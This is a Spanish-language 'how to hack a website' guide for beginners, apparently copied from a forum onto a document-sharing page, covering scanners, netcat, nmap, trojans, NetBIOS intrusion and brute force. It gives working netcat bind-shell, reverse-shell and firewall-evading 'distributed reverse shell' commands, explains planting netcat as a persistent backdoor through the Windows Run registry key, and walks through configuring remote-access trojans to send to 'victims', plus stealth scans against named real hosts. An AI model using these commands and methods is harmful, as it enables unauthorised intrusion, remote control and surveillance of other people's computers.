Você está na página 1de 9

Guia de como hackear un pagina web (para principiantes)

13_Principales herramientas
Faltan algunas, pero ya las ireis descubriendo segun las necesidades que tengis..
.
Aqu teneis una lista con las herramientas principales y como se usan:
14_Shadow Security Scanner ( o SSS)
Aqui teneis una captura de el SSS
Esta herramienta es la primera de la lista, es el escaner de vulnerabilidades y
de puertos ms usado y el mejor (con permiso del AcunetiX, que es parecido pero me
parece mejor),. Lo malo es que el programa no es gratis xD a si que os lo tendri
s que bajar o pagar $$$$
Bien, una vez instalado sale la pantalla. Es muy intuitivo.
Le damos a New Session
Complete Scan, y ya vamos siguiendo los pasos, que seran meter la ip una vez dado
a finalizar al acabar el proceso, para que empieze a escanear, seleccionamos la
ip o la web y le damos a start scan.
Una vez finalizado el escaner, a la izquierda tendremos una lista de los puertos
abiertos, adems de mucha ms informacin.
Si pinchamos en la pestaa Vulnerabilities nos saldrn una lista de sitios por donde
podremos pasar. La importancia de las vulnerabilidades se miden por colores, la
s azules no tienen mucha importancia, y las rojas son crticas, que son con las qu
e vamos a trabajar principalmente.
Si pinchamos en una vulnerabilidad, abajo del todo hay un nmero, si pinchamos nos
llevar a un sitio web donde nos dir a que afecta la vulnerabilidad, una descripcin
e incluso el exploit para poder aprovecharnos de esa vunerabilidad.
Nota para newbies: Un exploit es un cdigo, que una vez compilado en su lenguaje d
e programacin en el que est escrito ( normalmente c, esto se puede ver fijandose e
l la extensin que tiene el codigo del exploit) se abre con el ms-dos y se siguen
las instrucciones para conseguir acceso a la maquina remota.
15_Netcat
El netcat es una utilidad que sirve principalmente para escanear o ver el trafic
o que pasa por un puerto (sniffer), tambien vale para hacer un Chat, muchsimas co
sas, tambien puedes obtener el shell de otro ordenador con esta herramienta.
Funcionamiento:
Bien, abrimos el .exe que nos viene y nos sale una pantalla parecida a la del ms
-dos y pone cmd line:
Nota: Se manejar el netcat, pero ni mucho menos estoy informado de todas las cos
as que se pueden hacer con el, asi que he includo este texto, pero no es mo, que c
onste
Introduccin:
El netcat para win32, es un programa que funciona en ms-dos, sin entorno grfico,
y sirve para realizar conecciones de casi cualquier tipo en tcp y udp.
Conviene guardar nc.exe en %windir%/command (si vas a usar nc en una versin de wi
n anterior a winme) o en %windir%/system32 (si vas a usar nc en una versin poster
ior a winnt). Esto es xq en esas carpetas se guardan los comandos externos del m
s-dos y de esta forma vamos a poder usar el nc como un comando externo ms. La ven
taja de esto es q no vamos a tener q ubicar la lnea de comandos en la carpeta don
de est guardado el nc cada vez que lo keramos usar, sino que lo vamos a poder usa
r dsd cualquier carpeta.
Para ver la ayuda incluida en el nc tipeamos nc -h.
Principales modos de uso:
client
Podemos usar el nc para conectarnos a una maquina por cualquier puerto siempre q
ue ste este abierto.
La sintaxis bsica es:
{opciones} [ip/hostname] [puerto]
Las opciones, como su nombre lo indica, son opcionales, por lo que si yo tipeara
en mi linea de comandos:
201.234.131.38 23
Se conectara a 201.234.131.38 (fiar argentina) por el puerto 23 (telnet).
Es muy recomendable usar siempre la opcin -vv para que el nc nos de informacin sob
re el estado de la coneccin. Las opciones siempre van antes de la direccion ip o
el hostname y el puerto (en ese orden), por lo que la nueva sintaxis nos kedara:
-vv {opciones} [ip/hostname] [puerto]
Las opciones que se pueden combinar con este uso son:
-d (detach from console) modo oculto, en segundo plano, la coneccin sigue aunke c
cierre el ms-dos
-n (numeric ip only) c usa cuando c d una ip en vez de un hostname y no keres q e
l nc use dns para averiguar el hostname
-o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo hex
adecimal
-p (local port number) elegs el puerto local para la coneccin
-r (randomize local and remote ports) elige al azar los puertos no especificados
.
-s (local source address) direccin local
-i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada
-u (udp mode) realiza conecciones en puertos udp
-v (verbose) modo detallado, usar dos veces para que sea ms detallado
-w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de
las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de tr
ansmitir datos durante 3 segundos, la coneccin termina.
server
Podemos usar el nc para poner un puerto a la escucha y recibir conecciones entra
ntes.
La sintaxis bsica es:
-l -p {opciones} [puerto]
Donde [puerto] es el nmero de puerto que se kiere poner a la escucha.
La opcin -l puede usarse en mayscula -L si se desea que luego de finalizada la con
eccin, el nc siga escuchando en el mismo puerto con las mismas opciones. De otra
forma, al finalizar la coneccion, el nc se cerrara
Opciones adicionales:
-d (detach from console) funciona en segundo plano, independientemente del ms-do
s
-e (inbound program to exec) ejecuta un programa al conectarse un cliente.
-i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada.
-o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo hex
adecimal.
-r (randomize local and remote ports) elige al azar los puertos no especificados
.
-s (local source address) direccin local
-u (udp mode) realiza conecciones con puertos udp
-v (verbose) modo detallado, usar dos veces para que sea ms detallado
-w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de
las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de tr
ansmitir datos durante 3 segundos, la coneccin termina.
port scan
Podemos usar el nc para comprobar que puertos tiene abiertos una mquina.
La sintaxis bsica sera:
-z {opciones} [ip/hostname] [puerto/s]
Opciones adicionales:
-d (detach from console) funciona en segundo plano, independientemente del ms-do
s
-i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada.
-n (numeric ip only) c usa cuando c d una ip en vez de un hostname y no keres q e
l nc resuelva el hostname
-o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo en
hexadecimal.
-s (local source address) direccin local
-u (udp mode) realiza conecciones con puertos udp
-v (verbose) modo detallado, usar dos veces para que sea ms detallado
-w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de
las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de tr
ansmitir datos durante 3 segundos, la coneccin termina.
Los puertos pueden especificarse individualmente, x rangos (inclusivos) o ambos
en cualquier orden.
A partir de sto pueden inventar infinitos usos combinando el nc con otros program
as y opciones propias del ms-dos. Adems de varias opciones del nc que no expuse a
c xq no estoy seguro de poder explicarlas.
Ejmplos prcticos:
para conectarse a un servidor pop3
capital.cf.rffdc.edu.ar 110
para conectarse a un servidor smpt en modo detallado:
-vv capital.cf.rffdc.edu.ar 25
para conectarse a un servidor ftp en modo detallado dsd el puerto local 1337:
-vv -p 1337 capital.cf.rffdc.edu.ar 21
-vv -p 1337 ftp.microsoft.com.ar 21
-vv -p 1337 ftp.ar.geocities.com 21
-vv -p 1337 cablemodem.fibertel.com.ar 21
o x el cliente ftp de ms: ftp [ip/hostname]
para conectarse a un servidor telnet aprovechando la opcin -t (answer telnet nego
ciation)
-vv -t freeshell.org 23
-vv -t capital.cf.rffdc.edu.ar 23
o x el cliente telnet de ms: telnet [ip/hostname]
para conectarse a un servidor web en modo detallado dsd el puerto 2236 guardando
el trafico en un archivo hexadecimal llamado wdeah.txt:
-vv -p 2236 -o wdeah.txt www.google.com.ar 80
-vv -p 2236 -o wdeah.txt www.desertwolf.com.ar 80
-vv -p 2236 -o wdeah.txt www.fotolog.com 80
o x ms iexplorer en direccin: [ip/host]
escanear puertos individualmente:
-z www.ieslenguasvivasjrf.esc.edu.ar 21 23 20 22 80 110
escanear puertos por rangos inclusivos:
-z 200.123.160.225 20-23 137-139
escanear por puertos tanto especficos como por rangos:
-z www.ieslenguasvivasjrf.esc.edu.ar 137-139 80 110
shell directa
Mediante este comando en un windows posterior a winme
-l -p 2236 -e cmd.exe -d
A cualquiera que se conectase por el puerto 2236 mediante nc o telnet, le aparec
era una shell equivalente al cmd.exe de la maquina en la que se ejecut el comando.
Lo mismo ocurrira en un windows anterior a winme reemplazando cmd.exe por comman
d.com en el comando anterior.
shell inversa
Esta tcnica es una variacin de la primera, con la diferencia que en esta la mquina
que proporciona la shell se conecta a la otra pudiendo de sta forma saltar alguno
s routers y firewalls. Ideal para maquinas dentro de una red.
Se ejecuta el siguiente comando en una maquina para ponerla a la escucha de cone
xiones por el puerto 2236:
-vv -L -p 2236
Luego, se ejecuta el siguiente comando en la maquina que va a proporcionar la sh
ell para que se conecte a la primera:
-d -e [cmd.exe/command.com] [ip/hostname primera maq] 2236
shell inversa distribuida
Est tcnica es la ms silenciosa y efectiva de todas, en sta se realizan dos conexione
s inversas (una para enviar informacin y otra para recibirla) usando los puertos
25 y 80 que el firewall del win xp sp2 no filtra por tenerlos habilitados por de
fault para el envo (25 smpt) y recibo (80 http) de informacin.
Para esto abrimos dos ventanas en la maquina que recibir la shell en las que pone
mos:
-vv -l -p 80
y
-vv -l -p 25
Respectivamente, de manera que escuche conexiones por los puertos 80 y 25. Luego
, en la mquina q proporcionar la shell ponemos:
nc [ip/hostname maq escucha] 80 | cmd.exe | nc [ip/hostname maq escucha] 25
Una vez realizada la conexin, se envan los comandos desde la ventana que escucha p
or el puerto 80 y se reciben los resultados en la ventana que escucha por el pue
rto 25.
backdoor
Para dejar al nc funcionando a modo de backdoor se pueden utilizar diversos mtodo
s, tales como agregar un valor alfanumrico en el registro de win en la clave hkey
_local_machine\software\microsoft\windows\curr entversion\run, o agregar un lnea
al autoexec.bat o al win.ini, o utilizar el comando at, el programador de tareas
, etc.
chat peer to peer
Se puede crear un simple chat mediante nc entre dos personas escribiendo una de
ellas (server) ste comando:
-l -p 1337
y la otra (client) ste otro:
nc [ip/hostname de la maq dnd c ejecuto el comando anterior] 1337
La primera persona abrira el puerto 1337 para recibir coneccines y la segunda se c
onectara a su maquina por el puerto que la primera persona abri por lo que realiza
ran una coneccin directa puerto a puerto.
Luego, lo que una de las personas escribiese en su nc aparecera en el nc del otro
y viceversa.
El autor de este texto es Franco Pyrih
16_Nmap
El nmap es un escner, tambien de los ms usados en la actualidad, por sus mucha
s opciones y porque da muchsima informacin sobre el servidor que escanees, sus pue
rtos, ect.
Funcionamiento bsico:
El primer paso es obtener Nmap lo puede encontrar en http://www.insecure.org, ex
isten versiones para Windows UNIX y Linux entre otros. Si esta montando el siste
ma en Windows requiere WinPcap en Unix requerir Libpcap. Para el caso de Windows
requerir reiniciar el sistema para garantizar que se cargue el controlador del la
tarjeta. Una vez ha instalado la herramienta es hora de utilizarla, el primer s
can puede ser relativamente simple as:
nmap 192.168.1.1
Esta salida es la que podr ver en sus sistema:
$ nmap 192.168.1.254
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 15:08 EDT
Interesting ports on 192.168.1.254:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Este scan es muy bsico puesto que no se han definido ninguno de los parmetros del
sistema es apropiado decir que la salida es lo suficientemente clara, nos indica
que puestos estn abiertos, ahora si queremos mas informacin debemos hacer uso de
parmetros dentro del sistema.
En este punto vamos a ver una opcin bastante comn de scan que le permite hacer el
registro de servicios abiertos de forma discreta (sin registro en los Logs del si
stema)
$ nmap sS 192.168.1.1
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 15:40 EDT
Interesting ports on 192.168.1.1:
(The 1641 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp filtered smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
514/tcp filtered shell
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1026/tcp open LSA-or-nterm
1027/tcp open IIS
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv
6666/tcp filtered irc-serv
6667/tcp filtered irc
6668/tcp filtered irc
Nmap finished: 1 IP address (1 host up) scanned in 135.733 seconds
El truco detrs de este tipo de scan es que debemos lograr pasar lo mas inadvertid
os en el proceso puesto que de lograr hacer el barrido de puertos la mayora de lo
s Firewall van a intentar evitar el reconocimiento algunos de los sistemas detec
tan el barrido de puertos por medio de el anlisis de los requerimientos a los pue
rtos de forma muy rpida.
Cabe resaltar que existen varios tipos de modificadores de scan lo mas important
e es lograr identificar la combinacin mas apropiada, los modificadores que se pue
den utilizar para realizar el scan son los siguientes:
$ nmap sT 192.168.1.1
$ nmap sU 192.168.1.1
$ nmap sA 192.168.1.1
$ nmap sX 192.168.1.1
$ nmap sN 192.168.1.1
$ nmap sF 192.168.1.1
$ nmap sP 192.168.1.1
$ nmap sV 192.168.1.1
Veamos que significan estos modificadores
sT se intenta hacer un barrido de puertos por TCP la ventaja de esta tcnica es qu
e no requiere usuarios privilegiados, opuesto a sS
sU se intenta hacer un barrido de puertos por UDP, es til cuando se intentan desc
ubrir puertos de nivel superior que pueden estar detrs de un firewall, lenta pero
permite hacer auditorias mas exactas.
sA se usan mensajes de ACK para lograr que sistema responda y as dterminar si el
puerto esta abierto algunos Firewall no filtran estos Mensajes y por ello puede
ser efectivo en algunos casos.
sX puede pasar algunos Firewall con malas configuraciones y detectar servicios p
restndose dentro de la red
sN puede pasar algunos Firewall con malas configuraciones y detectar servicios p
restndose dentro de la red
sF puede pasar algunos Firewall con malas configuraciones y detectar servicios p
restndose dentro de la red
sP este modificador ayuda a identificar que sistemas estn arriba en la red (en fu
ncionamiento) para luego poder hacer pruebas mas especificas, similar a Ping.
sV intenta identificar los servicios por los puertos abiertos en el sistema esto
permite evaluar cada servicio de forma individual para intentar ubicar vulnerab
ilidades en los mismos.
sO con esta opcin se identifica que protocolos de nivel superior a capa tres (Red
o Network) responden en el sistema, de esta manera es mas fcil saber las caracte
rsticas de la red o el sistema que se intenta evaluar.
Adicionalmente a las opciones de scan se pueden especificar opciones que permite
n explotar mas aun la herramienta, dentro de las opciones que mas frecuentemente
se usan estn las de evitar el Ping o mostrar todos los resultados en pantalla al
mximo detalle, veamos cuales son estas opciones:
vv hacer la salida de la herramienta detallada en pantalla
f habilita la fracmentacion de esta forma es mucho mas complejo para un un firew
all u otro tipo de sistema lograr hacer el rastreo.
oN redirige la salida a un archivo
oX redirige la salida a un archivo XML
stylesheet con esta opcin se usa una hoja de estilo que hace mas fcil la lectura de
la salida en XML
P0 indica que no se debe hacer ping a los sistemas objetivo antes de iniciar el
anlisis til para evitar el bloque en algunos Firewall
p se usa para especificar puertos de anlisis o rango de puertos.
T se usa para especificar la velocidad general del scan de esta forma se puede p
asar inadvertido en algunos sistemas que detectan la velocidad de los paquetes e
ntrantes.
Texto extrado de www.dragonjar.us
NOTA IMPORTANTE: Para abrir el nmap, teneis que abrir el directorio donde lo ten
eis metido ( descomprimido, claro) con el ms-dos (ya sabis, usando dir y cd) y lu
ego nmap mas las opciones.
17_Troyanos.
Esta parte es importante
Los troyanos son programas, que constan de dos partes, el Server y el client
e. El Server se lo envas a la vctima debidamente configurado, y una vez que lo abr
a podrs controlar su ordenador desde el tuyo con el cliente, ver lo que esta escr
ibiendo en tiempo real (keylogger) , capturar su pantalla, acceder a su disco du
ro, ect
Los troyanos mas famosos son el subseven, el netbus, el bifrost y el poison ivy.
Hay dos tipos de troyanos, los de conexin directa, en el que tu te conectas a la
victima, que no los recomiendo, porque si la victima tiene la ip dinamica cuando
le cambie ya no vas a poder controlarlo, y los de conexin inversa, en el que la
victima se conecta a tu maquina (aunque ella no te puede controlar a ti, claro).
Bueno, primero teneis que ver antes de todo, si teneis la ip dinamica o estatica
, se puede comprobar en www.vermiip.es , si la ip va cambiando, es dinamica y te
tienes que hacer una cuenta en no-ip, si es estatica no hace falta.
http://www.no-ip.com/
De esta direccin podeis haceros la cuenta, os bajais el programilla y cada vez qu
e lo abrais tendreis la ip estatica.
Despus, configuras el troyano, en la ip metes la direccion no-ip que pusiste, por
ejemplo:
Hackerejemplo.no-ip.biz y en el puerto teneis que poner uno que este ABIERTO.
Para verlo ya sabeis, os haceis un scan a vosotros mismos y ya lo poneis.
El puerto abierto mas comun es el 80.
Algunos troyanos traen un test en el cliente para ver si el puerto que pones est
a abierto, como en el troyano poison ivy, muy bueno.
En el caso de no encontrar el puerto correcto, lo tendreis que abrir vosotros mi
smos en la configuracin del router.
18_Intrusin mediante NetBios
Este es un metodo poco usado en la actualidad, tambien por estar desfasado,
pero hay que saberlo. Trata sobre como acceder a los recursos que tiene comparti
dos un pc, como por ejemplo mis documentos, o el mismo disco duro
Lo primero: Configurando nuestro pc
Lo que tenemos que hacer para que nuestro pc pueda meterse en otro por NetBios,
lo primero es activarlo en nuestro pc.
Clic en Inicio.
Clic en Panel de control.
Clic en Conexiones de red.
Doble clic sobre el icono de conexin (la conexin a Internet, claro)
Clic en Propiedades.
En la ventana que apareci, dad doble clic sobre Protocolo Internet (TCP/IP).
Clic en Opciones avanzadas.
Clic en la pestaa WINS.
Clic sobre Habilitar NetBios sobre TCP/IP.
Clic en Aceptar (lo mismo para las dems ventanas).
Bueno, pues ya est habilitado, ahora manos a la obra.
Para comprobar si un pc comparte algo, tenemos que abrir el ms-dos y ejecutar el
siguiente comando:
C:\Documents and Settings\Pepe>nbtstat a ipdelavictima
Saldra el nombre de la maquina victima, y otros, como por ejemplo Casa, etc. Bie
n, si en la columna de al lado de los nombres de pcs hay algun 20 la maquina com
parte recursos.
Ahora vamos a ver lo que tiene compartido la mquina:
Se ejecuta el siguiente comando:
C:\Documents and Settings\Pepe>net view ipdelamaquina
Ejecutando este comando veremos lo que comparte ( por ejemplo, el disco duro)
Una vez hecho esto no vamos a Inicio-Ejecutar
En ejecutar ponemos
\\Ipdelavictima
Bueno, le damos a intro y eso (xD) y si todo sali bien nos aparecer una ventana de
Windows donde veremos los archivos compartidos.
Este metodo esta bien, aunque es un poco antiguo.
19_Intrusin mediante vulnerabilidades.
Ejemplo de un exploit
Es la forma de hackear mas actualizada, es decir, mas actual. Hay muchas clases
de vulnerabilidades, algunas necesitan exploit (un programa que nosotros compila
remos) o no, por ejemplo rfi (remote file inclusion), inyeccion SQL y ms...
Pero cada exploit es diferente, los puedes buscar en paginas como security focus
o milw0rm
Para informaros mas buscad en google
20_Fuerza Bruta
Es una manera de averiguar las contraseas de, ftp, webs y otras cosas con program
as que prueban distintas combinaciones de letras hasta que den con la contrasea.
Para la fuerza bruta recomiendo el Brutus AET2, y un buen diccionario con pa
labras.
Este metodo se suele utilizar como ultimo recurso, ya que es facil que te pillen
si lo utilizas demasiado...
21_Programacin
Bien, en este punto no me voy a detener mucho porque no puedo dedicarme a ensear
un lenguaje entero, este punto es simplemente para decir que aprender a programa
r es fundamental para esto, tal vez te parezca que no, pero llegara un momento q
ue tendras que hacer tus propios programas. Algunos lenguajes son: C, Python, Vi
sual Basic, etc, bueno hay muchos ms, elige el tuyo
http://www.solovagos.com/foro/hacking-exploit/4419-guia-de-como-hackear-un-pagin
a-web-para-principiantes.html

Você também pode gostar